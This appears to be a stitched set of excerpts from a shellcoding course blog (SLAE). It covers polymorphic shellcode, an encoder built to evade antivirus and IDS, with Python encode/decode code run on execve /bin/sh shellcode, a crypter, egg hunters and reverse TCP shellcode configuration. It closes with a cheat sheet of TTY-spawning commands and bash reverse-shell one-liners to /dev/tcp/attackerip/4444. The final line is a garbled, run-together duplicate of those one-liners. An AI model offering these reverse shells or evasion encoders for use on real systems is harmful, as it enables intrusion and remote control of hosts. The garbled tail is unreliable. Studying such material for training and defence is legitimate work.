Polymorphism is a generic technique for defeating pattern matching. Pattern matching means that a program P (an antivirus or an IDS) has a database of "signatures", where a signature is a byte sequence identifying a program. We can defeat such a program by replacing assembly instructions with a different but equivalent set of instructions, which yields a shellcode with different bytes and the same behaviour. Consider the example below, which clears a register and then moves a value into it.
...
Metasploit is an awesome penetration testing framework which includes a large number of exploits, payloads, encoders and more. Our goal in this assignment is to analyze three different payloads for linux/x86 generated with msfpayload (I will be using msfvenom instead) using GDB, ndisasm and libemu.
...
The last assignment is to create a crypter which encrypts the shellcode and decrypts it again at run time before executing it.
Our goals for this assignment are:
Create a crypter
Any encryption scheme may be used
Any programming language may be used for the implementation
...
The fourth assignment is to create a custom shellcode encoder and decoder. The whole point of encoding shellcode is to change its signature so that it is not detected by antivirus software and intrusion detection systems. This is critical in most real-world exploitation scenarios where AV and IDS are present. The encoder transforms the original shellcode into other bytes which, when disassembled, may look like meaningless instructions. At execution time, the decoder stub placed before the encoded shellcode decodes it in place and, once finished, jumps to the decoded shellcode. Note that the decoder stub itself runs unencoded, so it, rather than the payload, becomes the part a signature can still match.
Here is how the encoder is implemented:
1. XOR each byte of the original shellcode with 0xAA.
2. Apply a NOT operation to each byte of the result.
3. Rotate the whole shellcode right by 3 positions.
4. Apply an additive (running) XOR over the whole shellcode.
...
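The following is an added example, not the original post's encoder or decoder stub: a Python model of the four-step scheme above together with the inverse transformation, so that the round trip can be verified before the decoder is written in assembly. Two details the description leaves open are assumed here: "rotate right 3" is taken as a rotation of the byte array as a whole (the last three bytes move to the front), and "additive XOR" as chaining each byte with the previous encoded byte. The sample shellcode is the well-known Linux/x86 execve("/bin/sh") stub and is used only as constructed input; the function names are mine.

```python
# Added example: Python model of the four-step encoder and its decoder.
# Assumptions (not fixed by the post): step 3 rotates the whole byte
# array right by 3 positions; step 4 chains each byte with the previous
# encoded byte (a running XOR), which the decoder undoes with one XOR.

XOR_KEY = 0xAA
ROTATE = 3

# Constructed sample input: the classic Linux/x86 execve("/bin/sh") stub.
SAMPLE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
          b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")


def encode(shellcode: bytes) -> bytes:
    # Step 1: XOR every byte with the key.
    data = bytes(b ^ XOR_KEY for b in shellcode)
    # Step 2: bitwise NOT every byte, masked back to 8 bits.
    data = bytes((~b) & 0xFF for b in data)
    # Step 3: rotate the whole buffer right by ROTATE positions.
    r = ROTATE % len(data) if data else 0
    if r:
        data = data[-r:] + data[:-r]
    # Step 4: running XOR; each output byte depends on the previous output.
    out = bytearray()
    prev = 0
    for b in data:
        prev = b ^ prev
        out.append(prev)
    return bytes(out)


def decode(encoded: bytes) -> bytes:
    # Undo step 4: original byte i is enc[i] XOR enc[i-1] (enc[-1] = 0).
    data = bytearray()
    prev = 0
    for b in encoded:
        data.append(b ^ prev)
        prev = b
    data = bytes(data)
    # Undo step 3: rotate left by the same amount.
    r = ROTATE % len(data) if data else 0
    if r:
        data = data[r:] + data[:r]
    # Undo steps 2 and 1; NOT and XOR are their own inverses.
    data = bytes((~b) & 0xFF for b in data)
    return bytes(b ^ XOR_KEY for b in data)


def null_free(data: bytes) -> bool:
    # Encoded bytes are often delivered as a C string, so 0x00 would
    # truncate the payload; check before pasting into the decoder stub.
    return 0 not in data


def as_c_string(data: bytes) -> str:
    # Format bytes the way they are pasted into a C test harness.
    return "".join("\\x%02x" % b for b in data)


if __name__ == "__main__":
    enc = encode(SAMPLE)
    print("encoded  :", as_c_string(enc))
    print("null-free:", null_free(enc))
    print("roundtrip:", decode(enc) == SAMPLE)
```

The decoder stub in assembly only has to implement `decode` (a single XOR with the previous byte, a rotate, a NOT and an XOR with 0xAA), so keeping the Python inverse side by side makes it easy to confirm each step against the expected intermediate bytes.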
The third assignment is to study egg hunters and implement a working demo of an egg hunter with configurable payloads. So, what is an egg hunter?
An egg hunter is a short piece of code which is able to safely search the virtual address space for an "egg", a short string marking the beginning of a larger payload. The egg hunter code usually includes an error-handling mechanism for dealing with accesses to unallocated memory ranges.
...
Assignment #2: Shell Reverse TCP Shellcode (Linux/x86)
The second assignment is to create reverse TCP shellcode which does the following:
Connects back to an IP address and port
Executes a shell upon connection
The IP address and port number are configurable
...
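Making the IP address and port configurable means patching them into the shellcode as immediates, and the usual problem is that either value may contain a null byte (port 80 is 0x0050, 127.0.0.1 starts with 0x7f but contains 0x00). The block below is an added helper, not the assignment's shellcode, that packs both values the way the shellcode embeds them (sin_port in network byte order, sin_addr as inet_aton returns it) and flags null bytes; for an address with a null it returns the one's complement to push, leaving the shellcode to NOT it before use, which is a common null-avoidance trick. Function names are mine.

```python
# Added example: pack the configurable IP/port for a reverse TCP shellcode
# and check for null bytes. Not the original assignment's code.
import socket
import struct


def port_bytes(port: int) -> bytes:
    # sin_port is big-endian; the shellcode pushes it as a 16-bit word.
    return struct.pack(">H", port)


def ip_bytes(ip: str) -> bytes:
    # sin_addr in network byte order, exactly as it is pushed on the stack.
    return socket.inet_aton(ip)


def ip_immediate(ip: str) -> tuple:
    # Returns (dword, negated). If the raw address contains 0x00, push its
    # one's complement instead and NOT the register in the shellcode.
    # Edge case: an octet of 255 becomes 0x00 after complementing, so the
    # caller must still check the returned dword.
    raw = ip_bytes(ip)
    if 0 in raw:
        return bytes((~b) & 0xFF for b in raw), True
    return raw, False


def check_config(ip: str, port: int) -> dict:
    # Summary a practitioner wants before patching the values in.
    dword, negated = ip_immediate(ip)
    pbytes = port_bytes(port)
    return {
        "port": pbytes,
        "port_has_null": 0 in pbytes,
        "ip": dword,
        "ip_negated": negated,
        "ip_has_null": 0 in dword,
    }


if __name__ == "__main__":
    for ip, port in (("192.168.1.10", 4444), ("127.0.0.1", 4444), ("10.0.0.1", 80)):
        print(ip, port, check_config(ip, port))
```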
The SecurityTube Linux Assembly Expert (SLAE) course aims to teach the basics of assembly language on the Linux platform from a security perspective and its application to writing shellcode, encoders, decoders and crypters, among other things.
The exam style of the SecurityTube Linux Assembly Expert (SLAE) is a bit different. You have to complete 7 assignments of varying difficulty and post them on your blog. You also have to store the source code and all other helper scripts you used in your GitHub account.
...
Often during pen tests you may obtain a shell without a tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously which ones work will depend on the system environment and installed packages.
Shell Spawning
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
...
There are occasions where you have code execution on a target machine and sit there wondering what to do next.
Well, here is what you can do. Set up a netcat listener on port 4444 on your machine, then run one of the one-liners below on the target, replacing attackerip with the listener's address.
nc -nvlp 4444
Bash
exec /bin/bash 0<&0 2>&0
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done
# or:
while read line 0<&5; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/attackerip/4444 0>&1
...
exec /bin/bash 0&0 2>&0 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done bash -i >& /dev/tcp/attackerip/4444 0>&1 ...